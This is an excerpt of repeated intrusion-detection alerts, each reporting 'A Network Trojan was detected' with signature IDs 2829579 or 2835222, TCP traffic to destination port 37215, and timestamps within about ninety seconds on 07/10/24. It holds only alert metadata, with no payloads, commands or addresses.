                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.645172
                  SID:2829579
                  Source Port:59484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.925849
                  SID:2829579
                  Source Port:40400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2829579
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2829579
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.214564
                  SID:2835222
                  Source Port:59568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.614311
                  SID:2829579
                  Source Port:33588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023692
                  SID:2835222
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172944
                  SID:2829579
                  Source Port:47930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2835222
                  Source Port:55032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2829579
                  Source Port:42568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999285
                  SID:2835222
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2835222
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838617
                  SID:2829579
                  Source Port:37002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294907
                  SID:2835222
                  Source Port:48918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.461924
                  SID:2829579
                  Source Port:60260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499303
                  SID:2829579
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.745002
                  SID:2829579
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.277665
                  SID:2829579
                  Source Port:32866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828351
                  SID:2835222
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2829579
                  Source Port:53838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026177
                  SID:2835222
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.695827
                  SID:2829579
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679025
                  SID:2829579
                  Source Port:40222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2835222
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2835222
                  Source Port:47988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.874415
                  SID:2835222
                  Source Port:52588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.263380
                  SID:2829579
                  Source Port:39010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2835222
                  Source Port:55422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2835222
                  Source Port:39334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.927617
                  SID:2835222
                  Source Port:37692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2829579
                  Source Port:52110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190531
                  SID:2829579
                  Source Port:50528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950900
                  SID:2829579
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2835222
                  Source Port:35244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185789
                  SID:2835222
                  Source Port:47792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2835222
                  Source Port:49548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478512
                  SID:2829579
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608580
                  SID:2829579
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.264327
                  SID:2829579
                  Source Port:53784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476228
                  SID:2829579
                  Source Port:57054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2829579
                  Source Port:48484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2829579
                  Source Port:55640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.902594
                  SID:2835222
                  Source Port:49226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053673
                  SID:2829579
                  Source Port:59506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956514
                  SID:2829579
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.132533
                  SID:2829579
                  Source Port:55680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.036328
                  SID:2835222
                  Source Port:53728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373300
                  SID:2829579
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2835222
                  Source Port:58156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2835222
                  Source Port:37388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941876
                  SID:2835222
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.584136
                  SID:2829579
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134623
                  SID:2829579
                  Source Port:48668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:60032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.515884
                  SID:2835222
                  Source Port:56760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2829579
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.090184
                  SID:2835222
                  Source Port:54112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098099
                  SID:2835222
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2829579
                  Source Port:39998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149844
                  SID:2829579
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2829579
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2829579
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.655988
                  SID:2835222
                  Source Port:54752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2829579
                  Source Port:56142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.365317
                  SID:2835222
                  Source Port:38996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322127
                  SID:2835222
                  Source Port:60534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376308
                  SID:2829579
                  Source Port:42162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804937
                  SID:2829579
                  Source Port:44108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2835222
                  Source Port:55904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.466063
                  SID:2829579
                  Source Port:53718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399838
                  SID:2835222
                  Source Port:51876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2835222
                  Source Port:40676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.812740
                  SID:2835222
                  Source Port:52402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840335
                  SID:2835222
                  Source Port:50904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:36622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.303062
                  SID:2829579
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529010
                  SID:2829579
                  Source Port:51342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2829579
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962389
                  SID:2829579
                  Source Port:55898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2835222
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2835222
                  Source Port:59456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2835222
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2829579
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050918
                  SID:2835222
                  Source Port:45526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505389
                  SID:2829579
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2835222
                  Source Port:54508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.009589
                  SID:2829579
                  Source Port:33488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.220716
                  SID:2829579
                  Source Port:43934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488925
                  SID:2835222
                  Source Port:40240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.756681
                  SID:2829579
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350544
                  SID:2829579
                  Source Port:38942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551943
                  SID:2829579
                  Source Port:52912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2835222
                  Source Port:44246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799639
                  SID:2829579
                  Source Port:35236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2835222
                  Source Port:54460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2835222
                  Source Port:37756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2829579
                  Source Port:59022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2829579
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2835222
                  Source Port:59286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
                  SID:2829579
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2829579
                  Source Port:35130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179057
                  SID:2829579
                  Source Port:53584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237205
                  SID:2835222
                  Source Port:59402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2835222
                  Source Port:60198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.544056
                  SID:2835222
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2829579
                  Source Port:59428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2829579
                  Source Port:38266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368939
                  SID:2829579
                  Source Port:51804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.225931
                  SID:2835222
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2829579
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2835222
                  Source Port:50966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322726
                  SID:2829579
                  Source Port:47434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.815313
                  SID:2835222
                  Source Port:47304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2835222
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2829579
                  Source Port:37666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.930336
                  SID:2829579
                  Source Port:36108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.815601
                  SID:2835222
                  Source Port:34378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.420052
                  SID:2829579
                  Source Port:41394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2829579
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2835222
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2829579
                  Source Port:43682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.329184
                  SID:2829579
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389277
                  SID:2829579
                  Source Port:49982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834981
                  SID:2835222
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2829579
                  Source Port:38028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183998
                  SID:2829579
                  Source Port:43290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2829579
                  Source Port:43406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.922365
                  SID:2829579
                  Source Port:42974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2835222
                  Source Port:60762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.691821
                  SID:2835222
                  Source Port:38784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.994368
                  SID:2829579
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939708
                  SID:2829579
                  Source Port:53056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2829579
                  Source Port:58942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2829579
                  Source Port:54924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2829579
                  Source Port:34076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2835222
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2829579
                  Source Port:51758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.504243
                  SID:2829579
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668583
                  SID:2835222
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2835222
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2835222
                  Source Port:52940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881615
                  SID:2829579
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2829579
                  Source Port:56334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603230
                  SID:2835222
                  Source Port:51610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.088936
                  SID:2829579
                  Source Port:60514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.274123
                  SID:2829579
                  Source Port:44288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2835222
                  Source Port:36688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933162
                  SID:2829579
                  Source Port:42890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.413310
                  SID:2835222
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.542613
                  SID:2829579
                  Source Port:59400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2829579
                  Source Port:44392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2835222
                  Source Port:39386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2829579
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474716
                  SID:2829579
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.548179
                  SID:2829579
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.512805
                  SID:2829579
                  Source Port:51314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462695
                  SID:2829579
                  Source Port:59764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.890908
                  SID:2835222
                  Source Port:48752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609280
                  SID:2829579
                  Source Port:59428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.807864
                  SID:2835222
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454627
                  SID:2829579
                  Source Port:57566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2829579
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482479
                  SID:2829579
                  Source Port:52856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2829579
                  Source Port:34228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2829579
                  Source Port:41692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069901
                  SID:2835222
                  Source Port:38508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148385
                  SID:2829579
                  Source Port:43056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.839562
                  SID:2829579
                  Source Port:41220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013363
                  SID:2835222
                  Source Port:41982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.098210
                  SID:2829579
                  Source Port:47054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576651
                  SID:2835222
                  Source Port:37134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2829579
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999286
                  SID:2829579
                  Source Port:33308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.480155
                  SID:2835222
                  Source Port:53246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2829579
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2835222
                  Source Port:38830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421673
                  SID:2835222
                  Source Port:57504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2835222
                  Source Port:58470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196702
                  SID:2835222
                  Source Port:49264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2829579
                  Source Port:42406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.153335
                  SID:2835222
                  Source Port:36928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2835222
                  Source Port:56770
                  Destination Port:37215
